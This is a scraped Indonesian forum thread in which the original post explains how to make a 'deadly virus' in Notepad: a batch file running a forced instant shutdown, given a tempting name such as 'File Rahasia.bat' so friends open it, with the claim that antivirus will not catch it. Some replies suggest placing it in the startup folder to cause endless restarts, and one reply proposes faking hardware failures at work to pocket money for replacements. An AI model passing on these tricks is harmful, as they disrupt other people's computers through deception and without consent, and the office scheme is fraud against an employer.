alexa-tracking

Main Content

1024
1024
KASKUS
51
244
https://www.kaskus.co.id/thread/51cabdbe5a2acf7c0b000012/cara-membuat-virus-mematikan-menggunakan-notepad
Cara Membuat Virus Mematikan Menggunakan Notepad
Pada artikel ini saya akan share artikel tentang Cara Membuat Virus Mematikan Menggunakan Notepad.

Wow !!! virus ? tapi ini bukan virus seperti yang Anda bayangkan misalnya trojan, worm dll, hanya saja cara kerja dalam mengeksekusi korbannya mirip – mirip dikit lah emoticon-Big Grin

Kita akan membuat sebuah file menggunakan notepad, yang nanti jika file tersebut dibuka komputer akan mati secara otomatis, seperti judul diatas Virus “ Mematikan “ maksudnya mematikan komputer ( shutdown ) gituuu … hehe emoticon-Big Grin

Tenang saja file tersebut tidak bahaya untuk komputer Anda hanya saja bagi yang membuka file tersebut dia akan kaget karena komputernya mati sendiri.
Oke kalau Anda ingin membuat Virus virusan tersebut, saya akan share caranya dibawah ini :

• Pertama, buka notepad ( biasanya ada di Start >> All Programs >> Accessories >> notepad )
• Berikutnya, tulis / copy-paste kode ini pada notepad tersebut :
@echo shutdown -s -t 1 -f
Keterangan : angka yang berwarna hijau adalah waktu yang dibutuhkan untuk mematikan
komputer secara otomatis, jadi bisa diubah sesuai keinginan Anda ( 1 = 1 detik )

• Selanjutnya, Save As
1. Ubah Save as type menjadi All Files
2. Masukan nama file yang menarik untuk dibuka, misalnya File Rahasia, Game 3D atau
apa saja terserah tapi jangan lupa tambahkan .bat dibelakang nama file.
Contoh : File Rahasia.bat
3. Save
Nah.. sekarang coba buka file tersebut maka otomatis komputer Anda akan mati, file tersebut tidak akan terdeteksi antivirus jadi aman untuk yang mau ngerjain temennya haha… not recommended

Terimakasih telah berkunjung dan membaca artikel di Media 7 Semoga
Selamat Mencoba !!!emoticon-Blue Guy Cendol (L)
tar ah kalo iseng coba
Cara lama ya gan emoticon-Big Grin
ngapain virus dicari apalagi dibuat emoticon-Big Grin
iseng banget agannn
Quote:Original Posted By xiaope
ngapain virus dicari apalagi dibuat emoticon-Big Grin
iseng banget agannn


ih si xiaope emoticon-Ngacir
Yaaah ngeselin amat sebar2 virus
mantep nih buat isengin temen wakawakwak emoticon-Ngakak
emoticon-Matabelo
Ane mau cba akh emoticon-Ngacir, biar tmn ane pada pucet emoticon-Ngakak

Makasih infonya gan emoticon-shakehand
Quote:Original Posted By xiaope
ngapain virus dicari apalagi dibuat emoticon-Big Grin
iseng banget agannn
y

yahhh klo iseng aja gan dicoba coba
boleh tuh gan buat iseng-iseng ngerjain temen ane yg gaptek emoticon-Ngakak
ngga berani aku gan, baru aja install ulang nih windows emoticon-Cape d... (S)
alay emoticon-Big Grin
itu kan emang perintah command prompt buat shut down emoticon-Cape d... (S)
mending kalo mau iseng, isengnya yg berduit.
contoh : kalo lagi disuruh benerin komputer di kantor. bikin aja seolah2 hardware2 pada rusak, tar minta beli baru. duit masuk kantong deh, hehehe
ya elah ini cuman buat matiin kompi doank emoticon-Cape d... (S) make perintah cmd tapi editornya make notepad
wkakak.. nanti ane coba isengin temen ane ah..
lebih jail lagi taro di startup gan emoticon-Big Grin...
bakalan ngrestart trus tu kompi
emoticon-Ngakak
ane pernah coba tu gan
lumayan buat bikin temen ane panik emoticon-Big Grin
Quote:Original Posted By Dhimazz99
lebih jail lagi taro di startup gan emoticon-Big Grin...
bakalan ngrestart trus tu kompi
emoticon-Ngakak


Ide bagus ne